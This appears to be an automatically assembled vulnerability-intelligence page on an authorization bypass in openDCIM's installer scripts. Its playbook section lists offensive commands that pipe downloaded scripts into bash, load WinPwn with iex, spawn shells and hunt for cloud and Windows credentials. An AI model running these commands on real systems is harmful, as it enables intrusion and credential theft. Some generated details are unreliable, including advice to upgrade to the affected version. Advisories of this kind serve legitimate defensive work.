CVE-2026-28515
Overview
The vulnerability is an authorization bypass affecting openDCIM's installation and upgrade components. Specifically, install.php and container-install.php lack proper role-based access control, allowing any authenticated user to invoke LDAP configuration functions. The root cause is missing enforcement of application role checks on these endpoints, exposing sensitive configuration management features.
Vulnerability Description
openDCIM version 23.04, through commit 4467e9c4, contains a missing authorization vulnerability in install.php and container-install.php. The installer and upgrade handler expose LDAP configuration functionality without enforcing application role checks. Any authenticated user can access this functionality regardless of assigned privileges. In deployments where REMOTE_USER is set without authentication enforcement, the endpoint may be accessible without credentials. This allows unauthorized modification of application configuration.
Impact
An attacker with any authenticated access, or in some configurations no authentication, can modify LDAP configuration settings within openDCIM. This unauthorized configuration change can lead to persistent compromise, unauthorized access escalation, or disruption of directory services integration. The vulnerability enables attackers to alter critical application parameters, potentially undermining system integrity and confidentiality without requiring elevated privileges or user interaction.
Solution
Apply the patch introduced in openDCIM pull request #1664 (commit 8f7ab2a710086a9c8c269560793e47c577ddda09) which enforces proper role-based access controls on install.php and container-install.php. Upgrade to openDCIM version 23.04 or later containing this fix. Refer to the official openDCIM GitHub repository pull request https://github.com/opendcim/openDCIM/pull/1664 for detailed patch instructions and code changes.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in openDCIM version 23.04 arises from a missing authorization check in critical installation and upgrade scripts, specifically within the files install.php and container-install.php. This oversight allows any authenticated user to access and manipulate LDAP configuration settings without the necessary role-based permissions. The lack of stringent access controls means that users can potentially alter application configurations, leading to unauthorized changes that could compromise the integrity and security of the system. Furthermore, in environments where the REMOTE_USER variable is set without proper authentication measures, these endpoints may be exposed to users without any credentials, significantly widening the attack surface.
Attack vectors exploiting this vulnerability can be varied and sophisticated. An attacker with even minimal access to the system could leverage this flaw to gain unauthorized control over LDAP configurations. For instance, they could modify user privileges, change authentication methods, or even redirect LDAP queries to malicious servers. Additionally, if the application is deployed in a sensitive environment, such as a data center or an organization with strict access controls, the consequences of such unauthorized modifications could be severe. Attackers could create backdoors or escalate their privileges, leading to further exploitation of the system or lateral movement within the network.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on openDCIM for data center management. The ability to modify application configurations without authorization can lead to data breaches, loss of sensitive information, and potential regulatory non-compliance. Businesses may face reputational damage, financial losses, and legal ramifications if unauthorized changes lead to service disruptions or data leaks. The high CVSS score of 9.3 underscores the critical nature of this vulnerability, indicating that it poses a substantial risk to organizations that have not implemented adequate security measures.
To detect and mitigate this vulnerability, organizations should first conduct a thorough assessment of their openDCIM deployments to identify any instances of the affected version. Implementing strict access controls and role-based permissions is essential to ensure that only authorized personnel can access sensitive configuration functionalities. Additionally, organizations should consider employing web application firewalls (WAFs) to monitor and filter incoming traffic to these endpoints, thereby providing an additional layer of security. Regular security audits and vulnerability assessments can help identify and remediate such vulnerabilities before they can be exploited by malicious actors.
In conclusion, the missing authorization vulnerability in openDCIM presents a critical threat to organizations utilizing this software for data center management. By understanding the technical details, potential attack vectors, and real-world implications, cybersecurity professionals can better prepare their defenses. Implementing robust security measures and maintaining vigilance through regular assessments will be key to mitigating the risks associated with this vulnerability and protecting sensitive organizational data from unauthorized access and manipulation.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the missing authorization vulnerability in openDCIM’s install.php and container-install.php endpoints. This surge coincides with the public release of a Metasploit module that leverages a chained SQL injection and remote code execution exploit, significantly lowering the technical barrier for threat actors to weaponize this flaw. Our telemetry indicates that attackers are actively exploiting the ability to manipulate LDAP configuration parameters without authentication, enabling unauthorized code execution on affected systems. This development elevates the operational risk as automated and opportunistic attacks become more prevalent, increasing the likelihood of compromise in environments where openDCIM remains unpatched or improperly secured. Although the EPSS score remains relatively low and stable, the presence of a reliable exploit framework and increased detection frequency necessitates heightened vigilance. Consequently, the threat level should be considered elevated due to the demonstrated ease of exploitation and the potential for widespread impact on data center infrastructure management.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Opendcim | Opendcim | 23.04 |
cpe:2.3:a:opendcim:opendcim:23.04:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
openDCIM install.php SQL Injection to RCE
exploits/linux/http/opendcim_install_sqli_rce
|
- | Unknown | - | View |
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-665 | Exploitation of Thunderbolt Protection Flaws |
42%
|
Low | Very High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (9)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-28515 |
| chocapikk.com |
GitHub CVE
technical-description
exploit
|
https://chocapikk.com/posts/2026/opendcim-sqli-to-rce/ |
| github.com |
GitHub CVE
exploit
|
https://github.com/Chocapikk/opendcim-exploit |
| github.com |
GitHub CVE
issue-tracking
|
https://github.com/opendcim/openDCIM/pull/1664 |
| github.com |
GitHub CVE
patch
|
https://github.com/opendcim/openDCIM/pull/1664/changes/8f7ab2a710086a9c8c269560793e47c577ddda09 |
| github.com |
GitHub CVE
|
https://github.com/opendcim/openDCIM/blob/4467e9c4/install.php#L293 |
| github.com |
GitHub CVE
|
https://github.com/opendcim/openDCIM/blob/4467e9c4/install.php#L420-L434 |
| github.com |
GitHub CVE
|
https://github.com/opendcim/openDCIM/blob/4467e9c4/container-install.php#L421-L435 |
| vulncheck.com |
GitHub CVE
third-party-advisory
|
https://www.vulncheck.com/advisories/opendcim-missing-authorization-in-install-php |